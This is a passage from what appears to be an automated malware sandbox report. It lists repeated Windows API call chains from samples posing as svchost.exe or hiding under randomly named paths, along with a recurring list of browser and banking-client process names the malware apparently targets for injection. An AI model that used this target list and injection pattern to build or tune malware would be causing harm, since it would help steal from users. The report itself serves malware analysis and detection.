ormation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\tbb-firefox.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, 
\chrome.exe2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|2_2_02C73510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_01255890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01256370
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|6_2_01243510
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe7_2_01055890
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrS